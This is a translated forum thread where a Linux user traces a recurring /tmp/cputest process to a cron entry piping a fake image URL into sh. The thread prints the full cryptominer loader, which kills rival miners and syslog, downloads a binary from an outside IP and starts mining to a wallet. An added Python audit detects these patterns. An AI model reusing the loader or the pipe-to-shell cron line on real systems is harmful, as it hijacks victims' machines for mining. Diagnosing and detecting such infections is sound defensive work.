Help: a /tmp/cputest process keeps maxing out the CPU; every time I delete it, it comes back on its own. How do I figure out where this file comes from?

2017-04-06 10:20:03 +08:00
 Symo

5867 views
Node    Linux
8 replies
Symo
2017-04-06 10:25:47 +08:00
Found the problem. crontab has this line:
`curl http://194.87.239.7/common/logo.jpg|sh`
The downloaded file looks like this:
```
#!/bin/sh
rm -rf /tmp/index_bak.*
rm -rf /tmp/httpd.conf.*
rm -rf /tmp/httpd.conf
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill rsyslog
pkill syslog
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
else
curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
fi
chmod +x /tmp/cputest
nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
else
echo "runing....."
fi
```

What is this script supposed to do?
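The crontab line in this post is the textbook download-and-execute persistence: every scheduled run re-fetches the loader with `curl ... | sh`, so deleting `/tmp/cputest` only buys time until the next run, and the cron entry (plus the other places a job can live: the user's spool, `/etc/crontab`, `/etc/cron.d`) has to go before killing the process makes any difference. The following Python audit is an added example, not code from the thread or from the poster. It flags, over constructed crontab and `ps` output, the patterns visible in this post: a downloader piped straight into a shell, a URL disguised with an image-style extension, a binary executed out of a world-writable scratch directory, and miner-style arguments (`-a cryptonight`, `stratum+tcp://`). The hosts in the sample data are RFC 5737 TEST-NET addresses, not real infrastructure, and `WALLET_PLACEHOLDER` stands in for a wallet string.

```python
"""Audit user-crontab entries and a process list for download-and-execute cron
persistence and cryptominer command lines.

Added example for the thread above, not the poster's code. All sample data
below is constructed; 203.0.113.x are TEST-NET (RFC 5737) placeholder hosts."""
import re
from dataclasses import dataclass, field

# Constructed `crontab -l` output. The third entry mirrors the shape of the
# one found in the thread: fetch a "jpg" and pipe it straight into a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl http://203.0.113.10/common/logo.jpg|sh
@reboot /opt/app/bin/start.sh
* * * * * wget -q -O- http://203.0.113.10/x.txt | bash -s
30 1 * * 0 /usr/local/bin/backup --target /mnt/backups
"""

# Constructed `ps -eo pid,args` output. The 9913 line mirrors the flags the
# thread's script passes to its miner (algorithm flag, stratum pool URL).
SAMPLE_PS = """\
  PID COMMAND
    1 /sbin/init
  742 /usr/sbin/sshd -D
 9913 /tmp/cputest -B -a cryptonight -o stratum+tcp://203.0.113.20:80 -u WALLET_PLACEHOLDER -p x
 9920 /usr/bin/python3 /opt/app/worker.py
"""

DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# downloader output piped straight into an interpreter: "curl ... | sh"
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash|dash|zsh|python\d?|perl)\b")
# a URL whose extension claims "harmless file" (the thread's logo.jpg)
INNOCUOUS_EXT_URL = re.compile(r"https?://\S+?\.(?:jpe?g|png|gif|txt|pdf)\b", re.I)
# executables living in world-writable scratch directories
SCRATCH_EXEC = re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/\S+")
# miner-style arguments as seen in the thread: stratum pool URL or cryptonight algo
MINER_ARGS = re.compile(r"stratum\+tcp://|(?:^|\s)-a\s+cryptonight\b", re.I)


@dataclass
class Finding:
    source: str                     # "cron" or "ps"
    line: str                       # the offending line, whitespace-stripped
    reasons: list = field(default_factory=list)


def cron_command(entry: str) -> str:
    """Return the command part of a user-crontab entry (5 schedule fields or @keyword)."""
    parts = entry.split(None, 1) if entry.startswith("@") else entry.split(None, 5)
    return parts[-1] if len(parts) > 1 else ""


def inspect_command(command: str) -> list:
    """Return the list of reasons a command line looks like loader/miner activity."""
    reasons = []
    if PIPE_TO_SHELL.search(command):
        reasons.append("downloader output piped into a shell")
    if DOWNLOADER.search(command) and INNOCUOUS_EXT_URL.search(command):
        reasons.append("downloads a URL disguised with a harmless-looking extension")
    if SCRATCH_EXEC.search(command):
        reasons.append("executes a file from a world-writable scratch directory")
    if MINER_ARGS.search(command):
        reasons.append("miner-style arguments (stratum pool / cryptonight)")
    return reasons


def scan_crontab(text: str) -> list:
    """Flag suspicious entries in `crontab -l` style text (comments and blanks skipped)."""
    findings = []
    for raw in text.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = inspect_command(cron_command(entry))
        if reasons:
            findings.append(Finding("cron", entry, reasons))
    return findings


def scan_ps(text: str) -> list:
    """Flag suspicious processes in `ps -eo pid,args` style text (header skipped)."""
    findings = []
    for raw in text.splitlines()[1:]:
        entry = raw.strip()
        if not entry:
            continue
        _pid, _, args = entry.partition(" ")
        reasons = inspect_command(args)
        if reasons:
            findings.append(Finding("ps", entry, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB) + scan_ps(SAMPLE_PS):
        print(f"[{f.source}] {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a live host the same functions take the output of `crontab -l` for each user and of `ps -eo pid,args`; the patterns are deliberately narrow (they would not catch a loader that writes to `/root` or a miner launched under a renamed flag set), so treat a clean result as "nothing obvious", not as a clean bill of health.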
ryd994
2017-04-06 10:30:09 +08:00
Hahaha, that's nasty: first kill everyone else's mining software,
then start your own.
xss
2017-04-06 10:31:18 +08:00
Cryptomining trojan....
holyzhou
2017-04-06 10:51:00 +08:00
Can I just say this script is really ugly.
mingl0280
2017-04-06 12:27:45 +08:00
Mining trojan, lol
expy
2017-04-06 12:44:26 +08:00
Competitors are the real enemy; naming it cputest was clever too, lol
AlisaDestiny
2017-04-06 13:13:43 +08:00
Learned something new today. What I'm curious about is how that cron task got written in.
kmahyyg
2017-04-06 13:16:25 +08:00
Reply #3 has it right.

https://www.v2ex.com/t/352853